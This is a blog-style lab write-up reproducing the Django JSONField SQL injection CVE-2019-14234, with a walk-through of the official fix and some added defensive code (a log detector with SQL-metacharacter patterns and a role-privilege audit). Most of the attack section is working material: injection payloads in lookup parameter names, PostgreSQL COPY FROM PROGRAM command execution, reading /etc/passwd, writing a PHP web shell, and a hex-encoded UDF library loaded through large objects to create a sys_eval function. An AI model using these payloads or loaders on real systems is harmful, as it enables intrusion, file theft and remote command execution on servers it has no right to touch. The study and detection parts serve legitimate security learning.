CVE-2019-14234 Reproduction (Unfinished Notes)

An issue was discovered in Django 1.11.x (before 1.11.23), 2.1.x (before 2.1.11) and 2.2.x (before 2.2.4). Due to an error in shallow key transformation, key and index lookups on django.contrib.postgres.fields.JSONField, and key lookups on django.contrib.postgres.fields.HStoreField, were subject to SQL injection.

For example, the vulnerability could be exploited by placing OR 1 = 1 in a key or index name: a specially crafted dictionary, expanded as the **kwargs passed to QuerySet.filter(), would make the query return all records.

The fix

First, let's look at the official fix.
Fixed #30664


In django/db/backends/postgresql/schema.py, the value being passed is wrapped in strip_quotes(), which removes the ' (quote) characters from the string, that is, returns a new string with the specified characters stripped from both ends, and that result is what gets passed on.


Fixed #30769


Then, in the as_sql method of the KeyTransform class in django/contrib/postgres/fields/hstore.py, the direct interpolation of the string was changed so that self.key_name is passed separately in a parameter list. The %% here is a conversion specifier: it is rendered as a single literal % without consuming an argument, similar to \\\

```shell
In[1]: "%%"%()
Out[1]: '%'

# usage in practice
In [2]: '%s %%s'%'test'
Out[2]: 'test %s'
```

Now the next one.


In django/contrib/postgres/fields/jsonb.py, every place that returned self.key_name was likewise changed to pass it through the parameter list. A SQL injection test for JSONField was also added to the unit tests afterwards.
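To make the fix concrete, here is an added example (my code, not Django's) that models the two shapes of KeyTransform.as_sql(): the pre-fix version that formats the key name straight into the SQL text, and the post-fix version that uses %% to leave a %s placeholder and ships the key in the parameter list. The column expression and key values are constructed, and the version check at the end encodes the affected ranges stated above.

```python
"""Added example, not Django's own code: a minimal model of what the
CVE-2019-14234 fix changed in KeyTransform.as_sql(), plus a version check.
The lhs SQL and key names used with it are constructed sample values."""
from typing import List, Tuple

# Fixed versions per affected series, as stated in the advisory text above.
FIXED_IN = {(1, 11): 23, (2, 1): 11, (2, 2): 4}


def vulnerable_key_transform(lhs_sql: str, key_name: str) -> Tuple[str, List[str]]:
    """Pre-fix shape: the key name is formatted straight into the SQL text,
    so a quote inside the key closes the literal and alters the statement."""
    return "(%s -> '%s')" % (lhs_sql, key_name), []


def fixed_key_transform(lhs_sql: str, key_name: str) -> Tuple[str, List[str]]:
    """Post-fix shape: '%%' collapses to a single '%', leaving a '%s'
    placeholder for the driver; the key travels in the parameter list."""
    return "(%s -> %%s)" % lhs_sql, [key_name]


def driver_render(sql: str, params: List[str]) -> str:
    """Stand-in for the driver's client-side quoting (psycopg2 doubles embedded
    single quotes). Only used here to show the final statement text."""
    quoted = tuple("'" + p.replace("'", "''") + "'" for p in params)
    return sql % quoted


def is_safely_parameterized(sql: str, params: List[str]) -> bool:
    """Review check: no raw quote characters in the SQL text and exactly one
    placeholder per parameter."""
    return "'" not in sql and sql.count("%s") == len(params)


def is_in_affected_range(version: str) -> bool:
    """True when a plain numeric Django version string (e.g. '2.2.3') falls in a
    series named by the advisory and is older than that series' fix."""
    parts = [int(p) for p in version.split(".")[:3]]
    while len(parts) < 3:
        parts.append(0)
    major, minor, patch = parts
    fixed_patch = FIXED_IN.get((major, minor))
    return fixed_patch is not None and patch < fixed_patch


if __name__ == "__main__":
    lhs = '"vuln_collection"."detail"'      # constructed column expression
    for fn in (vulnerable_key_transform, fixed_key_transform):
        sql, params = fn(lhs, "a'b")
        print(fn.__name__, "->", sql, params,
              "safe" if is_safely_parameterized(sql, params) else "UNSAFE")
        print("  rendered:", driver_render(sql, params))
```

Running the block shows the pre-fix text ending in `'a'b')`, where the inner quote has already broken out of the literal, while the post-fix text keeps a single `%s` and the driver renders the key as `'a''b'`.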


Reproduction in the lab environment

P神 is a legend!

Open http://ip:port/admin/vuln/collection/
and pass the parameter

```text
?detail__a%27b=1
```

The error page shows the ' being included in the query:


which shows that the query can be built up from the parameter name.

```text
id_contains=admin
name_contains=admin
flag_contains=flag{

?detail__author'+=+'"a"')--
?detail__author%27+%3d+%27"a"%27)%20and%207778%3dCAST((SELECT%20version())%20AS%20NUMERIC)--
?detail__author'%3f'a') OR 1%3d2%20 -- OR%20 ("vuln_collection"."detail" -> 'detail
?detail__author'%3f'a') OR 1%3d2%20 %3bCREATE table cmd_exec(cmd_output text) -- OR%20 ("vuln_collection"."detail" -> 'detail
```

```sql
DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;
```
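The payloads above all share one trait: the SQL metacharacters live in the parameter name (the lookup key), not in its value. The following added detector (my example, not part of the original post) scans constructed access-log lines for Django field-lookup parameters whose names are not plain identifiers, which is how such requests can be picked out of web logs; the log format, client addresses and sample lines are made up, with the payload shapes taken from the list above.

```python
"""Added example (not from the original post): flag requests whose Django
field-lookup parameter names carry SQL metacharacters, the shape of the
CVE-2019-14234 payloads above. Log format and sample lines are constructed."""
import re
from typing import Dict, List, Tuple
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access log: "<client> <method> <path?query> <status>".
# Spaces inside the payloads are percent-encoded so each line stays one request.
SAMPLE_LOG = """\
10.0.0.5 GET /admin/vuln/collection/?detail__author=alice 200
10.0.0.5 GET /admin/vuln/collection/?detail__a%27b=1 500
10.0.0.7 GET /admin/vuln/collection/?detail__author%27+%3d+%27"a"%27)%20and%207778%3dCAST((SELECT%20version())%20AS%20NUMERIC)-- 500
10.0.0.7 GET /admin/vuln/collection/?detail__author'%3f'a')%20OR%201%3d2%20%3bCREATE%20table%20cmd_exec(cmd_output%20text)%20-- 500
10.0.0.9 GET /admin/vuln/collection/?name__contains=admin&detail__0=x 200
10.0.0.9 GET /admin/vuln/collection/?detail__first-name=Bob 200
"""

LOOKUP_SEP = "__"                           # Django's field/lookup separator
IDENT = re.compile(r"[A-Za-z0-9_]+")        # what a legitimate lookup name looks like
HIGH_RISK = re.compile(r"""['"();]|--""")   # quote, paren, statement and comment chars


def suspicious_lookups(query: str) -> List[Tuple[str, str]]:
    """Return (decoded parameter name, severity) for lookup-style parameters
    whose name is not a plain identifier. Names that merely contain characters
    such as '-' are 'low' (JSON keys can legitimately look like that); names
    carrying SQL metacharacters are 'high'."""
    findings = []
    for name, _value in parse_qsl(query, keep_blank_values=True):
        if LOOKUP_SEP not in name or IDENT.fullmatch(name):
            continue
        severity = "high" if HIGH_RISK.search(name) else "low"
        findings.append((name, severity))
    return findings


def scan_log(text: str) -> List[Dict[str, str]]:
    """Run suspicious_lookups over every request line of the constructed log."""
    alerts = []
    for line in text.splitlines():
        parts = line.split(" ", 3)
        if len(parts) < 4:
            continue                        # skip lines that do not fit the format
        client, _method, target, status = parts
        for name, severity in suspicious_lookups(urlsplit(target).query):
            alerts.append({"client": client, "param": name,
                           "severity": severity, "status": status})
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert["severity"].upper(), alert["client"], alert["status"], repr(alert["param"]))
```

Because parse_qsl decodes the name before the check, encoded quotes (`%27`) and spaces (`+`, `%20`) are caught the same way as literal ones; the `status` field is kept in each alert because the injected requests in the write-up produce a 500 while the benign filters return 200.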

Chunking script

```python
# -*- coding: utf-8 -*-
# Dump a file as hex, breaking the output every 2048 bytes so that each line
# maps to one pg_largeobject page (the chunks fed to the INSERTs below).
# Python 3 version: iterating over bytes yields ints, so no ord() is needed.
import sys

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: python " + sys.argv[0] + " inputfile")
        sys.exit()
    with open(sys.argv[1], 'rb') as fileobj:
        i = 0
        for b in fileobj.read():
            sys.stdout.write('{:02x}'.format(b))
            i += 1
            if i % 2048 == 0:
                print("\n")
```

PostgreSQL is a free object-relational database server (database management system).

Changing the database password as root

```bash
service postgresql start   # start the service
su postgres                # switch to the database user
psql postgres              # enter the database
alter user postgres with password 'postgres';   -- inside psql: set the database password to postgres
psql -h 127.0.0.1 -U postgres -W   # log in with the account and password
```

Inspecting information in the database

```sql
-- list databases
\l
-- list database users
\du
-- list a directory on the server (cannot be an absolute path)
select pg_ls_dir('./');
-- read a server-side file
select pg_read_file('postgresql.auto.conf', 0, 200);
```

Using the database to obtain system information

```sql
drop table if exists pwn;
create table pwn(t TEXT);
copy pwn from '/etc/passwd';          -- load the file into the table
select * from pwn limit 1 offset 0;   -- read it back one line at a time
drop table pwn;
```

Using the database to write files

```sql
drop table if exists pwn;
create table pwn (t TEXT);
insert into pwn(t) values ('<?php @system("$_GET[cmd]");?>');
select * from pwn;
copy pwn(t) to '/tmp/cmd.php';
drop table pwn;

-- or
copy (select '<?php phpinfo();?>') to '/tmp/1.php';
```

Using the database to execute system commands

Executing system commands requires a UDF library (somewhat like UDF privilege escalation in MySQL).
Create the .so and run the commands you need.

sql
SELECT lo_create(12345);
INSERT INTO pg_largeobject VALUES (12345, 0, decode('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', 'hex'));
INSERT INTO pg_largeobject VALUES (12345, 1, decode('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', 'hex'));
INSERT INTO pg_largeobject VALUES (12345, 2, decode('45ec488b45f84889c7e832fcffff488b45d8488b4020483b45f0740c488b45f04889c7e868fdffff8b45ec489889c0c9c3554889e5488d05a40400005dc3554889e54883ec5048897db8488b45b8488b40204889c7e8b6fcffff488945d8488b45d84889c7e876fcffff488945e0bf00040000e8a8fcffff488945e8bf01000000e89afcffff488945d0c745c800000000488b45d0c60000488b45e0488d350d0400004889c7e8b5fcffff488945f0eb55488b45e84889c7e8c3fbffff8945cc8b55c88b45cc01d04863d0488b45d04889d64889c7e866fcffff488945d08b45cc4863d08b45c84863c8488b45d04801c1488b45e84889c64889cfe850fbffff8b45cc0145c8488b55f0488b45e8be080000004889c7e8b5fbffff4885c07591488b45f04889c7e894fbffff488b45d00fb60084c074138b45c84898488d50ff488b45d04801d0c60000488b45d04889c7e85afcffff488945f8488b45f8c9c3554889e5488d05790300005dc3554889e54883ec4048897dc8488b45c8488b40204889c7e887fbffff488945e0488b45e08b00c1e80283e8048945d88b45d84898488945e8e8f6fbffff8945dc837ddc00790ab801000000e9ae000000837ddc000f8585000000bf1e000000e8affbffff4883e801488945f0488b55e8488b45f04801c2488b45f048f7d04821d0488945f0488b45f041b90000000041b800000000b921000000ba070000004889c6bf00000000e887faffff488945f848837df8ff7507b801000000eb40488b45e0488d4804488b55e8488b45f84889ce4889c7e80afaffff488b45f8ffd0837ddc007e148b45dcba01000000be0000000089c7e8eafaffffb800000000c9c3554889e5488d05700200005dc3554889e54883ec7048897d9864488b042528000000488945f831c0488b4598488b40204889c7e86bfaffff488945b048b83031323334353637488945e048b83839414243444546488945e8c645f000488b45b04889c7e80bfaffff488945b8488b45b8488d35ce0100004889c7e884faffff488945c048837dc0007512488b4598c6401c01b800000000e97f010000488b45c0ba02000000be000000004889c7e811faffff488b45c04889c7e8c5f9ffff8945ac488b45c0ba00000000be000000004889c7e8ecf9ffff8b45ac83c00148984889c7e8ccf9ffff488945c848837dc800751e488b45c04889c7e805f9ffff488b4598c6401c01b800000000e90b0100008b45ac4863f0488b55c0488b45c84889d1ba010000004889c7e8c5f8ffff488b45c04889c7e8c9f8ffff8b45ac01c083c00148984889c7e867f9ffff488945d0c745a400000000c745a800000000eb6b8
b45a88d50018955a84863d0488b45d04801c28b45a44863c8488b45c84801c80fb600c0f8040fbec083e00f48980fb64405e088028b45a88d50018955a84863d0488b45d04801c28b45a44863c8488b45c84801c80fb6000fbec083e00f48980fb64405e088028345a4018b45a43b45ac7c8d8b45a84863d0488b45d04801d0c60000488b45d04889c7e854f9ffff488945d8488b45d04889c7e8d4f7ffff488b45c84889c7e8c8f7ffff488b45b84889c7e8bcf7ffff488b45d8488b4df86448330c25280000007405e8f4f7ffffc9c300004883ec084883c408c300000000000000720072620000000000000000000000001c0000008a030000640000002000000040000000010000000100000001000000010000000100000001000000011b033b680000000c00000044f7ffff84000000e4f9ffffac000000f1f9ffffcc00000053faffffec000000c3faffff0c010000d0faffff2c01000045fbffff4c01000052fbffff6c01000074fcffff8c01000081fcffffac01000081fdffffcc0100008efdffffec0100001400000000000000017a5200017810011b0c070890010000240000001c000000b8f6ffff90010000000e10460e184a0f0b770880003f1a3b2a332422000000001c0000004400000030f9ffff0d00000000410e108602430d06480c07080000001c000000640000001df9ffff6200000000410e108602430d06025d0c070800001c000000840000005ff9ffff7000000000410e108602430d06026b0c070800001c000000a4000000aff9ffff0d00000000410e108602430d06480c07080000001c000000c40000009cf9ffff7500000000410e108602430d0602700c070800001c000000e4000000f1f9ffff0d00000000410e108602430d06480c07080000001c00000004010000def9ffff2201000000410e108602430d06031d010c0708001c00000024010000e0faffff0d00000000410e108602430d06480c07080000001c00000044010000cdfaffff0001000000410e108602430d0602fb0c070800001c00000064010000adfbffff0d00000000410e108602430d06480c07080000001c000000840100009afbffff2402000000410e108602430d06031f020c0708000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000', 'hex'));
INSERT INTO pg_largeobject VALUES (12345, 3, decode('000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a00e000000000000600e000000000000000000000000000001000000000000009b010000000000000c00000000000000100c0000000000000d00000000000000a0140000000000001900000000000000001e2000000000001b0000000000000008000000000000001a00000000000000081e2000000000001c000000000000000800000000000000f5feff6f00000000f00100000000000005000000000000009806000000000000060000000000000060020000000000000a00000000000000de010000000000000b0000000000000018000000000000000300000000000000002020000000000002000000000000004002000000000000140000000000000007000000000000001700000000000000d009000000000000070000000000000010090000000000000800000000000000c00000000000000009000000000000001800000000000000feffff6f00000000d008000000000000ffffff6f000000000100000000000000f0ffff6f000000007608000000000000f9ffff6f0000000003000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000', 'hex'));
INSERT INTO pg_largeobject VALUES (12345, 4, decode('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', 'hex'));
INSERT INTO pg_largeobject VALUES (12345, 5, decode('00000000000000000303000012000000000000000000000000000000000000001703000010001800e82020000000000000000000000000001c03000012000000000000000000000000000000000000002f03000012000000000000000000000000000000000000004403000010001800e02020000000000000000000000000005003000012000000000000000000000000000000000000006503000012000000000000000000000000000000000000007803000012000000000000000000000000000000000000008b0300001200000000000000000000000000000000000000a00300002000000000000000000000000000000000000000b403000020000000000000000000000000000000000000001104000012000c007a120000000000002402000000000000ce0300002200000000000000000000000000000000000000ea03000012000900100c0000000000000000000000000000f00300001000000000000000000000000000000000000000c701000012000c006d110000000000000001000000000000f603000012000000000000000000000000000000000000000804000012000c006d120000000000000d000000000000001e04000012000c003f0f00000000000070000000000000000063727473747566662e63005f5f4a43525f4c4953545f5f00646572656769737465725f746d5f636c6f6e6573005f5f646f5f676c6f62616c5f64746f72735f61757800636f6d706c657465642e37353934005f5f646f5f676c6f62616c5f64746f72735f6175785f66696e695f61727261795f656e747279006672616d655f64756d6d79005f5f6672616d655f64756d6d795f696e69745f61727261795f656e747279006c69625f706f737467726573716c7564665f7379732e630050675f6d616769635f646174612e35383133006d795f66696e666f2e35383331006d795f66696e666f2e35383436006d795f66696e666f2e35383639006d795f66696e666f2e35383838005f5f4652414d455f454e445f5f005f5f4a43525f454e445f5f005f5f64736f5f68616e646c65005f44594e414d4943005f5f474e555f45485f4652414d455f484452005f5f544d435f454e445f5f005f474c4f42414c5f4f46465345545f5441424c455f00667265654040474c4942435f322e322e350050675f6d616769635f66756e63007374726e6370794040474c4942435f322e322e35005f49544d5f64657265676973746572544d436c6f6e655461626c650070675f66696e666f5f7379735f62696e6576616c0070675f66696e666f5f7379735f6576616c0066726561644040474c4942435f322e322e35005f656461746
10066636c6f73654040474c4942435f322e322e35005f66696e69007374726c656e4040474c4942435f322e322e35005f5f737461636b5f63686b5f6661696c4040474c4942435f322e34006d6d61704040474c4942435f322e322e350073797374656d4040474c4942435f322e322e350070636c6f73654040474c4942435f322e322e350066676574734040474c4942435f322e322e350070675f66696e666f5f7379735f6578656300746578745f7074725f746f5f636861725f707472006674656c6c4040474c4942435f322e322e35005f5f676d6f6e5f73746172745f5f006d656d6370794040474c4942435f322e31340070675f6465746f6173745f646174756d006d616c6c6f634040474c4942435f322e322e35005f656e6400667365656b4040474c4942435f322e322e35007265616c6c6f634040474c4942435f322e322e35005f5f6273735f737461727400776169747069644040474c4942435f322e322e3500706f70656e4040474c4942435f322e322e3500666f70656e4040474c4942435f322e322e3500737973636f6e664040474c4942435f322e322e35005f4a765f5265676973746572436c6173736573005f49544d5f7265676973746572544d436c6f6e655461626c65005f5f6378615f66696e616c697a654040474c4942435f322e322e35005f696e697400706672656500666f726b4040474c4942435f322e322e350070675f66696e666f5f7379735f66696c6572656164006368725f7074725f746f5f746578745f70747200002e73796d746162002e737472746162002e7368737472746162002e6e6f74652e676e752e6275696c642d6964002e676e752e68617368002e64796e73796d002e64796e737472002e676e752e76657273696f6e002e676e752e76657273696f6e5f72002e72656c612e64796e002e72656c612e706c74002e696e6974002e706c742e676f74002e74657874002e66696e69002e726f64617461002e65685f6672616d655f686472002e65685f6672616d65002e696e69745f6172726179002e66696e695f6172726179002e6a6372002e64796e616d6963002e676f742e706c74002e64617461002e627373002e636f6d6d656e7400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001b000000070000000200000000000000c801000000000000c80100000000000024000000000000000000000000000000040000000000000000000000000000002e000000f6ffff6f0200000000000000f001000000000000f0010000000000006c000000000000000300000000000000080000000000000000000000000
00000380000000b00000002000000000000006002000000000000600200000000000038040000000000000400000002000000080000000000000018000000000000004000000003000000', 'hex'));
INSERT INTO pg_largeobject VALUES (12345, 6, decode('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', 'hex'));

SELECT lo_export(12345, '/tmp/udf.so');
SELECT lo_unlink(12345);
CREATE OR REPLACE FUNCTION sys_eval(text) RETURNS text AS '/tmp/udf.so', 'sys_eval' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE; -- run a command
select sys_eval('id');
drop function sys_eval(text); -- remove the function
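Every step in this section depends on a specific server-side privilege in PostgreSQL, which is what a defender should audit on the role the application connects as. The added example below (my code, not from the post) maps the techniques above to the privilege each one needs and walks constructed pg_roles/pg_auth_members-style data to report which of them a given role could reach. Role names and memberships are invented; the pg_read_server_files, pg_write_server_files and pg_execute_server_program predefined roles exist in PostgreSQL 11 and later.

```python
"""Added example (not from the original post): given catalog-style role data,
report which of the post-exploitation steps above a database role could carry
out, so the application role can be checked against least privilege.
The role names and memberships below are constructed."""
from typing import Dict, List, Set

# Constructed stand-in for `select rolname, rolsuper from pg_roles`.
ROLES: Dict[str, bool] = {
    "postgres": True,
    "django_app": False,
    "reporting": False,
    "ops_readers": False,
    "pg_read_server_files": False,
    "pg_execute_server_program": False,
}

# Constructed stand-in for pg_auth_members: member role -> roles granted to it.
MEMBERSHIPS: Dict[str, Set[str]] = {
    "reporting": {"ops_readers"},
    "ops_readers": {"pg_read_server_files"},
    "django_app": set(),
}

# What each technique from this section requires (superuser always suffices).
# pg_read_file/pg_ls_dir and server-side lo_export are superuser-only unless
# EXECUTE is explicitly granted, and C functions can only be created by a
# superuser, so those are modelled as superuser-only here.
REQUIREMENTS: Dict[str, Set[str]] = {
    "COPY ... FROM PROGRAM 'id'": {"superuser", "pg_execute_server_program"},
    "COPY ... FROM '/etc/passwd' (read a server file)": {"superuser", "pg_read_server_files"},
    "COPY ... TO '/tmp/cmd.php' (write a server file)": {"superuser", "pg_write_server_files"},
    "pg_read_file / pg_ls_dir (default grants)": {"superuser"},
    "lo_export to a server path and CREATE FUNCTION ... LANGUAGE C": {"superuser"},
}


def effective_roles(role: str) -> Set[str]:
    """Transitive closure of role memberships: GRANT role TO role is
    inheritable by default, so nested groups count."""
    seen: Set[str] = set()
    stack = [role]
    while stack:
        current = stack.pop()
        for granted in MEMBERSHIPS.get(current, set()):
            if granted not in seen:
                seen.add(granted)
                stack.append(granted)
    return seen


def capabilities(role: str) -> Set[str]:
    """Predefined roles the role holds, plus 'superuser' when rolsuper is set."""
    caps = set(effective_roles(role))
    if ROLES.get(role, False):
        caps.add("superuser")
    return caps


def reachable_techniques(role: str) -> List[str]:
    """Techniques from this section whose requirement the role satisfies."""
    caps = capabilities(role)
    return sorted(t for t, needs in REQUIREMENTS.items() if caps & needs)


if __name__ == "__main__":
    for name in ("django_app", "reporting", "postgres"):
        reach = reachable_techniques(name)
        print(f"{name}: {len(reach)} of {len(REQUIREMENTS)} techniques reachable")
        for t in reach:
            print("   -", t)
```

The point of the transitive walk is that a role which looks harmless in pg_roles can still inherit pg_read_server_files through an intermediate group, as `reporting` does here; an application role that reaches zero techniques, like `django_app`, turns a JSONField injection into a data-exposure problem rather than a code-execution one.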

A bit of rambling

There is still a lot to learn from this CVE, so I'll leave this as an open item and spend some time later getting to know JSONField.
(PS: the open items I leave for myself keep piling up.)

School has started, and lately some new postgraduate entrance exam policies have left me anxious and restless. Time to calm down and prepare properly.



Author: 晓黑
Article link: https://www.suk1.top/2020/02/18/CVE_2019_14234/
Copyright notice: Unless otherwise stated, all articles on this blog are licensed under CC BY-NC-SA 4.0. When reposting, please credit Manayakko - 微笑才是王道